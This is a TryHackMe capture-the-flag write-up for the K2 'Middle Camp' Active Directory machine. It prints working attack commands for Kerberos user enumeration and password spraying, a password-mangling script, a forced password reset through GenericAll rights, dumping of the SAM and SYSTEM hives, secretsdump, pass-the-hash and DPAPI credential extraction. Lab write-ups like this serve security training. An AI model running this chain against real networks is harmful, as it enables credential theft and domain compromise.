Middle Camp

K2 - Are you able to make your way through the mountain? - by hadrian3689

TryHackMe | Cyber Security TrainingTryHackMe

The following post by 0xb0b is licensed under CC BY 4.0

---

Recon

We stop the first machine and start the second. Our enumeration process starts all over again. We run another Nmap scan. And find several related ports to windows. This time we don't have a website. This seems to be a pure AD machine.

The ports include SMB, RDP, LDAP and Kerberos. After a default service and script scan, we can determine the name of the machine K2SERVER. We add K2SERVER.K2.THM to our /etc/host file.

As already mentioned on the main page, this is worthy of a network. The machines are related to each other. And we need to pay attention to the note in the Room description.

Use all of the information gathered from your previous findings in order to keep making your way to the top.

Foothold

A good resources to follow a methodology on Active Directory enumeration is the orange- cyberdefense mindmap: https://orange-cyberdefense.github.io/ocd-mindmaps/img/pentest_ad_dark_2023_02.svg

So, what information do we have? We know the first and last names of at least two users. We can create a word list of possible usernames and use it to enumerate the different users using kerbrute.

After running kerbrute with the created wordlist we are able to spot two valid usernames.

In this writeup, I switch between the different tools because I'm not that experienced with this topic yet, and depending on the version or fork of a tool, the syntax may differ.

./kerbrute_linux_amd64 userenum users.txt --domain k2.thm --dc <IP>

As well as users, we also found a lot of passwords. We now spray these onto the target with the two users we found. We realize that the password we found in /home/rose/bash_history applies to r.bud.

kerbrute -users users.txt -passwords passwords.txt -domain k2.thm

Using evil-winrm, we can now log in to the machine with the username and password combination we determined. We have foothold but do not find a flag, but two notes.

But with our Foothold, we can already answer the second question.

Lateral Movement I

In the notes, we find a password policy and the previously used password of j.smith. Furthermore, we get the information that the password for j.smith had to be changed. Since the user was unable to remember a new password, the old one was simply adapted to match the policy. Since the original one only contained characters, a number and a special character had to be added.

We write a script to prepend and append different permutations of numbers and special characters to create a word list, alternatively johntheripper could be used to mangle a password list.

gen_pass.py

import itertools
import string

# Base password, replace it
base_password = "REDACTED" 

# Special characters and numbers
special_chars = string.punctuation  # Contains special characters like !, @, #, $, etc.
numbers = "0123456789"  # Numbers from 0-9

# Generate all combinations of one special character and one number
combinations = list(itertools.product(special_chars, numbers))

# Generate all password combinations with prepending and appending
passwords = []

# Prepending the combination
for special_char, number in combinations:
    passwords.append(f"{special_char}{number}{base_password}")  # Prepend both
    passwords.append(f"{number}{special_char}{base_password}")  # Prepend number first

# Appending the combination
for special_char, number in combinations:
    passwords.append(f"{base_password}{special_char}{number}")  # Append both
    passwords.append(f"{base_password}{number}{special_char}")  # Append number first

# Prepend one and append the other
for special_char, number in combinations:
    passwords.append(f"{special_char}{base_password}{number}")  # Prepend special, append number
    passwords.append(f"{number}{base_password}{special_char}")  # Prepend number, append special

# Print the generated passwords
for password in passwords:
    print(password)

# Optionally, write the passwords to a file
with open("generated_passwords.txt", "w") as f:
    for password in passwords:
        f.write(password + "\n")

print(f"Generated {len(passwords)} password combinations.")

We generate the wordlist and use it with kerbrute for user j.bold.

python gen_pass.py 

And we have the password for j.bold. Unfortunately, we cannot access the system as j.smith using evil-winrm. As you can see from the note, RDP is also blocked for this user.

Lateral Movement II

Now we use bloodhound-python. BloodHound-python is a tool used to gather Active Directory data, focusing on relationships and attack paths between users, groups, and computers. It collects information such as group memberships and user privileges, which can be visualized to help identify potential privilege escalation opportunities.

Since we could get problems with the name server using the tool that it does not work properly, we use dnschef. DNSChef is a DNS proxy tool used for DNS spoofing, allowing users to intercept and modify DNS requests. It can be used in penetration testing to redirect traffic or simulate malicious DNS responses for specific domains.

After setting up DNSChef, we use the following call to bloodhound-python with the credentials from r.bud to gather Active Directory data to find an exploit path.

bloodhound-python -d k2.thm -c All -u 'r.bud' -p 'REDACTED' -dc k2.thm -ns 127.0.0.1

Next, we start our bloodhound python to review the files.

We drop thos in, that we have extracted.

And we find an interesing relation. The user j.bold is member of the IT STAFF 1 and has GenericAll permissions on j.smith.

By right clicking on the edge Generic all we can view at the Linux abuse tap how to make use of it. In short we can force a password change with a rpc call.

We copy the suggested command of bloodhound.

net rpc password "TargetUser" "newP@ssword2022" -U "DOMAIN"/"ControlledUser"%"Password" -S "DomainController"

And adpat this to set a new password for j.smith using the credentials of j.bold

net rpc password "j.smith" "newP@ssword2022" -U "k2.thm"/"j.bold"%"REDACTED" -S "k2.thm"

After changing the password we are able to log in as j.smith with the new set password using evil.winrm. On the Desktop of the user we find the user flag.

Privilege Escalation

The privilege escalation vector could already be found using bloodhound and the data set we already retrieved. But is also locally possible.

With acces as j.smith we query the privileges we have now with whoami /priv. That user has the SeBackupPrivilege permission.

This allow access to the SAM and SYSTEM hive, which holds valuable hashes.

Backup Operator Privilege Escalation < BorderGateBorderGate

Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files. Backup Operators also can log on to and shut down the computer. This group can’t be renamed, deleted, or removed. By default, this built-in group has no members, and it can perform backup and restore operations on domain controllers.

With the following commands we save those hashes and use evil-winrm to download the hives.

*Evil-WinRM* PS C:\Users\j.smith\Desktop> reg save hklm\sam c:\Windows\Tasks\SAM
The operation completed successfully.

*Evil-WinRM* PS C:\Users\j.smith\Desktop> reg save hklm\system c:\Windows\Tasks\SYSTEM
The operation completed successfully.

*Evil-WinRM* PS C:\Users\j.smith\Desktop> download c:\Windows\Tasks\SAM
                                        
Info: Downloading c:\Windows\Tasks\SAM to SAM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\j.smith\Desktop> download c:\Windows\Tasks\SYSTEM
                                        
Info: Downloading c:\Windows\Tasks\SYSTEM to SYSTEM
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\j.smith\Desktop> 

Next, we use impacket-secretsdump to dump the hashes. We get the local administrator hash, and can use the second half to log in using evil-winrm. With that output we are able to answer the foruth question of task 2.

impacket-secretsdump -sam SAM -system SYSTEM LOCAL

Via Pass-The-Hash we log in as administrator and are able to retieve the final flag.

Furthermore we are able to retrieve the cleartext password of the administrator using netexec with the --dpapi switch, which could be interesting for later use. See Hikers writeup:

TryHackMe-K2 Walkthrough- Middle Camp (Part 2/3)Medium

DPAPI (Data Protection API) is a Windows feature used to securely encrypt sensitive data like passwords, certificates, and encryption keys. An exploit targeting DPAPI involves retrieving encrypted data from a compromised system and then decrypting it using the system's master keys, which can often be extracted if administrative or elevated privileges are obtained.

nxc smb k2.thm -u administrator -H 'REDACTED' --dpapi